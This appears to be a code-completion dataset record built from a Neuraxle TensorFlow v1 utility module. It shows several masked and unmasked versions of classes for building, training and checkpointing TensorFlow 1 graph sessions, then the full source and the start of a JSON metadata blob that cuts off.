'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
<|reserved_special_token_0|>
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TensorflowV1ModelStep(BaseTensorflowModelStep):
"""
Base class for tensorflow 1 steps.
It uses :class:`TensorflowV1StepSaver` for saving the model.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,
:class:`~neuraxle.base.BaseStep`
"""
HYPERPARAMS = HyperparameterSamples({})
HYPERPARAMS_SPACE = HyperparameterSpace({})
def __init__(self, create_graph, create_loss, create_optimizer,
create_feed_dict=None, data_inputs_dtype=None,
expected_outputs_dtype=None, variable_scope=None,
has_expected_outputs=True, print_loss=False, print_func=None):
BaseTensorflowModelStep.__init__(self, create_model=create_graph,
create_loss=create_loss, create_optimizer=create_optimizer,
create_inputs=create_feed_dict, data_inputs_dtype=
data_inputs_dtype, expected_outputs_dtype=
expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),
print_loss=print_loss, print_func=print_func)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) ->BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(
log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'],
name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) ->BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {self['data_inputs']: data_inputs}
if self.has_expected_outputs:
feed_dict.update({self['expected_outputs']: expected_outputs})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self,
data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']],
feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {self['data_inputs']: data_inputs}
results = self.session.run([self[inference_output_name], self[
'loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
def __getitem__(self, item):
"""
Get a graph tensor by name using get item.
:param item: tensor name
:type item: str
:return: tensor
:rtype: tf.Tensor
"""
if ':' in item:
split = item.split(':')
tensor_name = split[0]
device = split[1]
else:
tensor_name = item
device = '0'
try:
result = self.graph.get_tensor_by_name('{0}/{1}:{2}'.format(
self.variable_scope, tensor_name, device))
except KeyError:
result = None
if result is None:
try:
result = self.graph.get_operation_by_name('{0}/{1}'.format(
self.variable_scope, tensor_name))
except KeyError:
result = tf.get_variable(tensor_name, [])
return result
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext') ->'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context,
step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context:
'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.meta'.format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(),
'{0}.ckpt.index'.format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), '{0}.ckpt'.format(step.
get_name()))
<|reserved_special_token_1|>
"""
Neuraxle Tensorflow V1 Utility classes
=========================================
Neuraxle utility classes for tensorflow v1.
..
Copyright 2019, Neuraxio Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tensorflow as tf
from neuraxle.base import BaseSaver, BaseStep, ExecutionContext
from neuraxle.hyperparams.space import HyperparameterSamples, HyperparameterSpace
from neuraxle_tensorflow.tensorflow import BaseTensorflowModelStep
class TensorflowV1ModelStep(BaseTensorflowModelStep):
"""
Base class for tensorflow 1 steps.
It uses :class:`TensorflowV1StepSaver` for saving the model.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,
:class:`~neuraxle.base.BaseStep`
"""
HYPERPARAMS = HyperparameterSamples({})
HYPERPARAMS_SPACE = HyperparameterSpace({})
def __init__(
self,
create_graph,
create_loss,
create_optimizer,
create_feed_dict=None,
data_inputs_dtype=None,
expected_outputs_dtype=None,
variable_scope=None,
has_expected_outputs=True,
print_loss=False,
print_func=None
):
BaseTensorflowModelStep.__init__(
self,
create_model=create_graph,
create_loss=create_loss,
create_optimizer=create_optimizer,
create_inputs=create_feed_dict,
data_inputs_dtype=data_inputs_dtype,
expected_outputs_dtype=expected_outputs_dtype,
step_saver=TensorflowV1StepSaver(),
print_loss=print_loss,
print_func=print_func
)
if variable_scope is None:
variable_scope = self.name
self.variable_scope = variable_scope
self.has_expected_outputs = has_expected_outputs
self.create_feed_dict = create_feed_dict
def setup(self, context: ExecutionContext) -> BaseStep:
"""
Setup tensorflow 1 graph, and session using a variable scope.
:return: self
:rtype: BaseStep
"""
if self.is_initialized:
return self
self.graph = tf.Graph()
with self.graph.as_default():
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
self.session = tf.Session(config=tf.ConfigProto(log_device_placement=True), graph=self.graph)
model = self.create_model(self, context)
if not isinstance(model, tuple):
tf.identity(model, name='output')
else:
tf.identity(model[0], name='output')
tf.identity(model[1], name='inference_output')
tf.identity(self.create_loss(self), name='loss')
self.create_optimizer(self, context).minimize(self['loss'], name='optimizer')
init = tf.global_variables_initializer()
self.session.run(init)
self.is_initialized = True
def teardown(self) -> BaseStep:
"""
Close session on teardown.
:return:
"""
if self.session is not None:
self.session.close()
self.is_initialized = False
return self
def strip(self):
"""
Strip tensorflow 1 properties from to step to make the step serializable.
:return: stripped step
:rtype: BaseStep
"""
self.graph = None
self.session = None
return self
def fit(self, data_inputs, expected_outputs=None) -> 'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.fit_model(data_inputs, expected_outputs)
def fit_model(self, data_inputs, expected_outputs=None) -> BaseStep:
"""
Fit tensorflow model using the variable scope.
:param data_inputs: data inputs
:param expected_outputs: expected outputs to fit on
:return: fitted self
:rtype: BaseStep
"""
feed_dict = {
self['data_inputs']: data_inputs
}
if self.has_expected_outputs:
feed_dict.update({
self['expected_outputs']: expected_outputs
})
if self.create_inputs is not None:
additional_feed_dict_arguments = self.create_inputs(self, data_inputs, expected_outputs)
feed_dict.update(additional_feed_dict_arguments)
results = self.session.run([self['optimizer'], self['loss']], feed_dict=feed_dict)
loss = results[1]
self.add_new_loss(loss)
return self
def transform(self, data_inputs, expected_outputs=None) -> 'BaseStep':
with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):
return self.transform_model(data_inputs)
def transform_model(self, data_inputs):
"""
Transform tensorflow model using the variable scope.
:param data_inputs:
:return:
"""
inference_output_name = self._get_inference_output_name()
feed_dict = {
self['data_inputs']: data_inputs
}
results = self.session.run([self[inference_output_name], self['loss']], feed_dict=feed_dict)
self.add_new_loss(results[1], test_only=True)
return results[0]
def _get_inference_output_name(self):
"""
Return the output tensor name for inference (transform).
In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.
:return:
"""
inference_output_name = 'output'
if len(self['inference_output'].get_shape().as_list()) > 0:
inference_output_name = 'inference_output'
return inference_output_name
def __getitem__(self, item):
"""
Get a graph tensor by name using get item.
:param item: tensor name
:type item: str
:return: tensor
:rtype: tf.Tensor
"""
if ":" in item:
split = item.split(":")
tensor_name = split[0]
device = split[1]
else:
tensor_name = item
device = "0"
try:
result = self.graph.get_tensor_by_name("{0}/{1}:{2}".format(self.variable_scope, tensor_name, device))
except KeyError:
result = None
if result is None:
try:
result = self.graph.get_operation_by_name("{0}/{1}".format(self.variable_scope, tensor_name))
except KeyError:
result = tf.get_variable(tensor_name, [])
return result
class TensorflowV1StepSaver(BaseSaver):
"""
Step saver for a tensorflow Session using tf.train.Saver().
It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.
.. seealso::
`Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,
:class:`~neuraxle.base.BaseSaver`
"""
def save_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':
"""
Save a step that is using tf.train.Saver().
:param step: step to save
:type step: BaseStep
:param context: execution context to save from
:type context: ExecutionContext
:return: saved step
"""
with step.graph.as_default():
saver = tf.train.Saver()
saver.save(step.session, self._get_saved_model_path(context, step))
step.strip()
return step
def load_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':
"""
Load a step that is using tensorflow using tf.train.Saver().
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
step.is_initialized = False
step.setup(context)
with step.graph.as_default():
saver = tf.train.Saver()
saver.restore(step.session, self._get_saved_model_path(context, step))
return step
def can_load(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext'):
"""
Returns whether or not we can load.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
meta_exists = os.path.exists(os.path.join(context.get_path(), "{0}.ckpt.meta".format(step.get_name())))
index_exists = os.path.exists(os.path.join(context.get_path(), "{0}.ckpt.index".format(step.get_name())))
return meta_exists and index_exists
def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):
"""
Returns the saved model path using the given execution context, and step name.
:param step: step to load
:type step: BaseStep
:param context: execution context to load from
:type context: ExecutionContext
:return: loaded step
"""
return os.path.join(context.get_path(), "{0}.ckpt".format(step.get_name()))
|
flexible
|
{
"blob_id": "76a22408bb423d9a5bc5bc007decdbc7c6cc98f7",
"index": 8397,
"step-1": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n <mask token>\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-2": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param 